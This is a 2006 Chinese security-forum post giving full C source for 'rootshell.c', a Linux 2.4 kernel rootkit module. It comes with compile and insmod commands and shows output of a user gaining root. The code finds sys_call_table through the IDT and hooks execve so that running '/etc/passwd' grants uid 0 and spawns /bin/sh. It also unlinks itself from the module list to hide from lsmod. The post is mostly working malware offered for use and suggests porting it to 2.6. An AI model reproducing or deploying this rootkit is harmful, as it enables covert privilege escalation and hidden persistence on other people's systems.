[原创]Linux rootshell.c for kernel 2.4.x
文章作者:sgl
信息来源:邪恶八进制信息安全团队( www.eviloctal.com)
rootshell.c 是我的linux rookit tthacker中的一个功能,通过执行/etc/passwd,即可获得的一个rootshell.如果你熟悉linux 2.6内核编程的话,可以将其移植到2.6的平台上,模块中对sys_call_table地址的寻找和对系统调用的劫持,应该可以工作到2.6内核下.
* Compile with:
* gcc -I/usr/src/linux-2.4.20-8/include -c rootshell.c
* [root@tthacker capturemod]# insmod rootshell.o
* [tthacker@tthacker capturemod]$ /etc/passwd
[root@tthacker capturemod]# id
uid=0(root) gid=0(root) groups=500(tthacker)
[root@tthacker capturemod]#
* [root@tthacker capturemod]# lsmod|grep rootshell
[root@tthacker capturemod]#
[ 此贴被EvilOctal在2006-06-13 12:28重新编辑 ]
信息来源:邪恶八进制信息安全团队( www.eviloctal.com)
rootshell.c 是我的linux rookit tthacker中的一个功能,通过执行/etc/passwd,即可获得的一个rootshell.如果你熟悉linux 2.6内核编程的话,可以将其移植到2.6的平台上,模块中对sys_call_table地址的寻找和对系统调用的劫持,应该可以工作到2.6内核下.
* Compile with:
* gcc -I/usr/src/linux-2.4.20-8/include -c rootshell.c
* [root@tthacker capturemod]# insmod rootshell.o
* [tthacker@tthacker capturemod]$ /etc/passwd
[root@tthacker capturemod]# id
uid=0(root) gid=0(root) groups=500(tthacker)
[root@tthacker capturemod]#
* [root@tthacker capturemod]# lsmod|grep rootshell
[root@tthacker capturemod]#
Copy code
/*
* rootshell.c, part of the tthacker package
* Ported to kernel 2.4.x 2006 by W.Z.T <[email]tthackers@163.com[/email]>
* execve "/etc/passwd" to get a rootshell.
* Compile with:
* gcc -I/usr/src/linux-2.4.20-8/include -c rootshell.c
* [root@tthacker capturemod]# insmod rootshell.o
* [tthacker@tthacker capturemod]$ /etc/passwd
[root@tthacker capturemod]# id
uid=0(root) gid=0(root) groups=500(tthacker)
[root@tthacker capturemod]#
* [root@tthacker capturemod]# lsmod|grep rootshell
[root@tthacker capturemod]#
*/
#ifndef MODULE
#define MODULE
#endif
#ifndef __KERNEL__
#define __KERNEL__
#endif
#include <linux/init.h>
#include <linux/module.h>
#include <linux/version.h>
#include <linux/string.h>
#include <linux/kernel.h>
#include <linux/string.h>
#include <linux/kernel.h>
#include <asm/unistd.h>
#include <linux/slab.h>
#include "uaccess.h"
MODULE_LICENSE("GPL");
struct descriptor_idt
{
unsigned short offset_low;
unsigned short ignore1;
unsigned short ignore2;
unsigned short offset_high;
};
static struct {
unsigned short limit;
unsigned long base;
}__attribute__ ((packed)) idt48;
#define MODULE_NAME "rootshell"
char *command="/etc/passwd";
char *rootshell="/bin/sh";
static unsigned int SYS_CALL_TABLE_ADDR;
void **sys_call_table;
int base_system_call;
int (*orig_execve)(struct pt_regs regs);
unsigned char opcode_call[3]={0xff,0x14,0x85};
int match(unsigned char *source)
{
int i;
for(i=0;i<3;i++){
if(source[i] != opcode_call[i])
return 0;
}
return 1;
}
int get_sys_call_table(void)
{
int i,j;
unsigned char *ins=(unsigned char *)base_system_call;
unsigned int sct;
for(i=0;i<100;i++){
if(ins[i]==opcode_call[0]){
if(match(ins+i)){
sct=*((unsigned int *)(ins+3+i));
return sct;
}
}
}
printk(KERN_ALERT "can't find the address of sys_call_table/n");
return -1;
}
int n_execve(struct pt_regs regs)
{
int error=0;
char *filename=NULL,**argv;
filename=getname((char *)regs.ebx);
if(!strcmp(filename,command)){
current->uid=current->euid=current->suid=current->fsuid=0;
current->gid=current->egid=current->sgid=current->fsgid=0;
strcpy(filename,rootshell);
argv=(char *)regs.ecx;
put_user(0,argv+1);
}
error=do_execve(filename,(char **)regs.ecx,(char **)regs.edx,®s);
putname(filename);
return error;
}
int init_module(void)
{
struct module *mp,*p;
__asm__ volatile ("sidt %0": "=m" (idt48));
struct descriptor_idt *pIdt80 = (struct descriptor_idt *)(idt48.base + 8*0x80);
base_system_call = (pIdt80->offset_high<<16 | pIdt80->offset_low);
SYS_CALL_TABLE_ADDR=get_sys_call_table();
sys_call_table=(void **)SYS_CALL_TABLE_ADDR;
orig_execve=sys_call_table[__NR_execve];
sys_call_table[__NR_execve]=n_execve;
p=&__this_module;
mp=p;
while(p->next){
if(!strcmp(p->name,MODULE_NAME)){
if(mp==p){
while(p->next->next->next)
p=p->next;
mp->name=p->name;
}
else
mp->next=p->next;
break;
}
mp=p;
p=p->next;
}
return 0;
}
void cleanup_module()
{
sys_call_table[__NR_execve]=orig_execve;
}
[ 此贴被EvilOctal在2006-06-13 12:28重新编辑 ]